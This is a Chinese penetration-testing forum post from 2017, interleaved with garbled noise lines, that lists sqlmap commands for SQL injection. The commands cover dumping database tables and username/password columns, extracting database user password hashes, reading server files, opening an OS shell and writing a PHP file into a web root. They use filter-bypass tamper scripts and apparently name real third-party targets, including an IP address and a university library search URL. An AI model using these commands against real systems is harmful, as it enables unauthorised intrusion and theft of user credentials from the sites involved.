中国网络渗透测试联盟
标题:
sqlmap使用实例
[打印本页]
作者:
admin
时间:
2017-5-19 17:03
标题:
sqlmap使用实例
/pentest/database/sqlmap
& p1 |* a) ^5 P& d& @
. N1 q& D$ k; {6 `( u8 i
update :::::> in the folder after execute following order : svn update
7 @9 r$ z" [8 j& O& ~: c
$ I, {9 V1 _9 s1 U% U, j) T6 k
sqlmap.py -r 1.txt --current-db
2 x, [+ l: F6 @1 ?! w
- E6 \3 ]5 [5 E4 z4 o+ U
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
, o& o0 Y1 z+ C
: h7 g5 X9 f6 h# i
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
( v1 c) r* j$ B1 W* R
猜解数据库
5 |) z4 W0 ]3 }& z+ v+ E
./sqlmap.py -u "injection-url" --dbs
7 m' h* }& D3 S& T; c) n
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
" X4 l" l' \' e4 s1 `& g6 I0 R$ w" U
) T( t1 u! U/ f! p; n3 N
猜解表名
/ _& v: H0 S- f* h( \1 K0 S/ I! K
./sqlmap.py -u "injection-url" -D database_name --tables
0 E( ?+ G) A- A: ]
: T; |& `- S4 p
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
" A/ n2 F# J% x# q t7 p; [
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
! A- G; N6 S- ^+ [
% ?5 g" P2 \9 N/ {# N5 a% F0 f
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
# W5 q" O0 I; ^6 K+ I L
, M9 Y( J8 r' D8 G3 B# a
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
% s- v+ G. I4 F) |* A0 B6 U
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
* M+ N/ Y1 j: _, X6 g* \* f
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
* N7 \9 {1 O" S& L& l/ f
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
9 p; h3 ~% `( m; f% h0 X
7 P3 w/ z" g3 u( ^
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
- ^% i8 {% s; M' ?
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
9 p* m# E! j3 l( w! n
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
' f+ p+ f) M4 W7 K
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
2 g' N* k+ T0 C" O' [3 k
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
: ^# g2 s$ c! @7 a, ?+ P
$ P; i( }6 l8 U( v1 d' h% x; Y
sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了
) I; h9 D4 B& m- y
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
! `1 s. \) {, y# S6 }
0 {# i2 |; ~, D. D* p
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
0 v: l) f% e1 t, l; m
猜解列名
5 P3 ]& `# R9 G
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
0 F# I( t# j3 _- R- F" |% l
8 Y. C6 b: D, N3 L& u
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
( P9 w& s. Z6 G2 _* `: o9 s4 h9 _5 H
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
8 I$ t2 j; d3 W5 W3 @7 r- n, n. B8 ~
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
3 y7 h+ Y# M6 R# y8 p0 s
- N7 k8 n7 f& J2 k
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
2 n2 R5 C" n7 ] Q- e: N
&submit=Go
2 {1 _' f, L2 v3 I- y3 D$ A% v
猜解值
- ~" T0 }7 J% {
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
. T0 x y% o$ R) H/ s
========================================================
+ t |3 B2 V% E7 f3 u5 t! N/ Z; J
搜索表名中包括mana字符的
, y) f6 l/ C q; T, B' V
/sqlmap.py -u "injection-url" -T mana --search
3 }% }0 f- K. p! K' ]
返回一个交互式sql shell
0 p3 d3 K1 M- T4 C7 U
/sqlmap.py -u "injection-url" --sql-shell
% S/ K# u& n" {: s# f4 M$ d$ C
读取指定文件(需权限)
0 B/ R; X1 b$ j$ @. M4 e. M
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
" [# |! U% R! ]6 u
查看当前 用户 及 数据库
# Y, [: k; K( H1 L' ~5 x8 R6 U
/sqlmap.py -u "injection-url" --current-user --current-db
* Y6 l* q4 x8 L+ f. u0 Z1 `
本地文件 写入 远程目标绝对路径
, h3 g. f) v6 k" _2 o. T
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
/ V5 b) g ^8 k( [
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
/ s2 t% J) N# P
. F8 P' E0 M' `1 w( p) K
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
. g8 t( U' V+ K9 d) P" g9 F# v
查看某用的权限
\; |, ]# i) v# n- j
/sqlmap.py -u "injection-url" --privileges -U root
! F9 s; R: @/ g/ s- J3 i* S% s7 r
查看当前用户是否为dba
5 n. m% ` }4 `
/sqlmap.py -u "injection-url" --is-dba
6 ]4 u! }& `6 E9 X) O$ L# e. u3 {/ x
读取所有数据库用户或指定数据库用户的密码
5 ~& k/ N8 ^% Q* z' E, E) y# X+ T0 o
sqlmap.py -r 1.txt --users --passwords
8 u4 u1 C& A( D5 j! E
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
- t& N# t# q1 q7 |
8 I+ f8 I* i9 N& D' |+ M3 z
/sqlmap.py -u "injection-url" --passwords -U root
8 W* h# G. H) e, p
) G% Y& h8 W' \" Z
--start&&--stop 与 --first&&--last 的区别
2 Z9 a D3 c- T5 ~# I0 q4 ~
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
3 g M3 o9 p: C/ y! f& i L% l
! O3 R: f% I0 I- @" N5 z2 p) Q. K
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
; ?0 U. L% P, O; Y) o
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
6 k9 R0 ~$ f/ J
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
3 W% e. y* u$ ?, E* m
( c+ y( f: ?8 N; J0 e
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
% E/ b% Z2 W9 J8 G( T a
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
6 E- y9 ]; L! ~* P; _7 D/ _
1 _% N1 ^" Q& n. X5 i6 k, `% v x
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2